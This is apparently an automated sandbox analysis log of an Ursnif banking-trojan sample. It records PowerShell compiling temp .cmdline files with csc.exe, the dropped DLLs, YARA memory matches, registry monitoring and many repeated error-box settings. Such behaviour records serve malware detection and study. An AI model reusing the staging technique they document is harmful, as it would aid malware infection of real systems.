Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
